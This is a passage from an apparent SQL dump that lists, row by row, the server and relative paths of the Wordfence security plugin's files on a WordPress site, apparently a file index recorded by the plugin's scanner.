png','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(11988,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/loading.gif','wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(11989,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/loading_background.png','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(11990,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/menu.svg','wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(11991,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(11992,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(11993,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(11994,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(11995,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(11996,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(11997,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/admin-global.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1699289814.js'),(11998,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/admin.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/admin.1699289814.js'),(11999,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1699289814.js'),(12000,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1699289814.js'),(12001,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1699289814.js'),(12002,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1699289814.js'),(12003,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1699289814.js'),(12004,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/js/login.1699289814.js','wp-content/plugins/wordfence/modules/login-security/js/login.1699289814.js'),(12005,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/.htaccess','wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(12006,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(12007,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php','wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php'),(12008,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php','wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php'),(12009,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(12010,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(12011,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/code.php','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(12012,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(12013,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php'),(12014,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(12015,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(12016,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(12017,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(12018,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(12019,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(12020,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php'),(12021,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php'),(12022,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(12023,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(12024,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(12025,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(12026,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(12027,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(12028,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(12029,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(12030,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(12031,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(12032,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(12033,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(12034,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php','wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php'),(12035,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/manage.php','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(12036,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/page.php','wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(12037,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php','wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php'),(12038,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/role.php','wp-content/plugins/wordfence/modules/login-security/views/page/role.php'),(12039,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(12040,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(12041,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(12042,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/settings/options.php','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(12043,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(12044,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php','wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php'),(12045,'/home/eckank5/public_html/wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(12046,'/home/eckank5/public_html/wp-content/plugins/wordfence/readme.txt','wp-content/plugins/wordfence/readme.txt'),(12047,'/home/eckank5/public_html/wp-content/plugins/wordfence/tmp/.htaccess','wp-content/plugins/wordfence/tmp/.htaccess'),(12048,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/.htaccess','wp-content/plugins/wordfence/vendor/.htaccess'),(12049,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/autoload.php','wp-content/plugins/wordfence/vendor/autoload.php'),(12050,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/ClassLoader.php','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(12051,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php','wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php'),(12052,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/LICENSE','wp-content/plugins/wordfence/vendor/composer/LICENSE'),(12053,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(12054,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(12055,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(12056,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_real.php','wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(12057,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/autoload_static.php','wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(12058,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/installed.json','wp-content/plugins/wordfence/vendor/composer/installed.json'),(12059,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/composer/installed.php','wp-content/plugins/wordfence/vendor/composer/installed.php'),(12060,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php'),(12061,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php'),(12062,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Database.php'),(12063,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php'),(12064,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Endianness.php'),(12065,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php'),(12066,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php'),(12067,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php'),(12068,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php'),(12069,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php'),(12070,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php'),(12071,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php'),(12072,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbException.php'),(12073,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/MmdbThrowable.php'),(12074,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/RuntimeMmdbException.php'),(12075,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IntegerParser.php'),(12076,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Io/FileHandle.php'),(12077,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php'),(12078,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php'),(12079,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php'),(12080,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeReader.php'),(12081,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/NodeRecord.php'),(12082,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(12083,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(12084,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(12085,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/api.php'),(12086,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(12087,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(12088,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php'),(12089,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(12090,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(12091,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(12092,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(12093,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(12094,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(12095,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php'),(12096,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(12097,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(12098,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(12099,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(12100,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(12101,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(12102,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(12103,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(12104,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(12105,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(12106,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(12107,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(12108,'/home/eckank5/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(12109,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/.htaccess','wp-content/plugins/wordfence/views/.htaccess'),(12110,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/block-list.php','wp-content/plugins/wordfence/views/blocking/block-list.php'),(12111,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/blocking-create.php','wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(12112,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/blocking-status.php','wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(12113,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/country-block-map.php','wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(12114,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/country-modal.php','wp-content/plugins/wordfence/views/blocking/country-modal.php'),(12115,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(12116,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(12117,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(12118,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/block-navigation-option.php','wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(12119,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/indeterminate-progress.php','wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(12120,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/license.php','wp-content/plugins/wordfence/views/common/license.php'),(12121,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/modal-prompt.php','wp-content/plugins/wordfence/views/common/modal-prompt.php'),(12122,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(12123,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/page-help.php','wp-content/plugins/wordfence/views/common/page-help.php'),(12124,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/page-tabbar.php','wp-content/plugins/wordfence/views/common/page-tabbar.php'),(12125,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/page-title.php','wp-content/plugins/wordfence/views/common/page-title.php'),(12126,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/section-subtitle.php','wp-content/plugins/wordfence/views/common/section-subtitle.php'),(12127,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/section-title.php','wp-content/plugins/wordfence/views/common/section-title.php'),(12128,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/status-circular.php','wp-content/plugins/wordfence/views/common/status-circular.php'),(12129,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/status-critical.php','wp-content/plugins/wordfence/views/common/status-critical.php'),(12130,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/status-detail.php','wp-content/plugins/wordfence/views/common/status-detail.php'),(12131,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/status-tooltip.php','wp-content/plugins/wordfence/views/common/status-tooltip.php'),(12132,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/status-warning.php','wp-content/plugins/wordfence/views/common/status-warning.php'),(12133,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/common/unsubscribe.php','wp-content/plugins/wordfence/views/common/unsubscribe.php'),(12134,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/global-status.php','wp-content/plugins/wordfence/views/dashboard/global-status.php'),(12135,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/option-howgetips.php','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(12136,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-alert.php','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(12137,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(12138,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(12139,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-general.php','wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(12140,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-import.php','wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(12141,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-license.php','wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(12142,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(12143,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(12144,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/dashboard/status-renewing.php','wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(12145,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/diagnostics/text.php','wp-content/plugins/wordfence/views/diagnostics/text.php'),(12146,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/gdpr/banner.php','wp-content/plugins/wordfence/views/gdpr/banner.php'),(12147,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(12148,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php','wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php'),(12149,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/banner.php','wp-content/plugins/wordfence/views/onboarding/banner.php'),(12150,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(12151,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/fresh-install.php','wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(12152,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(12153,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/overlay.php','wp-content/plugins/wordfence/views/onboarding/overlay.php'),(12154,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/plugin-header.php','wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(12155,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/registration-prompt.php','wp-content/plugins/wordfence/views/onboarding/registration-prompt.php'),(12156,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/onboarding/tour-overlay.php','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(12157,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/options/block-all-options-controls.php','wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(12158,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/options/block-controls.php','wp-content/plugins/wordfence/views/options/block-controls.php'),(12159,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/options/option-label.php','wp-content/plugins/wordfence/views/options/option-label.php'),(12160,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/options/option-select.php','wp-content/plugins/wordfence/views/options/option-select.php'),(12161,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/options/option-switch.php','wp-content/plugins/wordfence/views/options/option-switch.php'),(12162,'/home/eckank5/public_html/wp-content/plugins/wordfence/views/options/option-text.php','wp-content/plugins/wordfence/views/options/option-text.php'),(12163,'/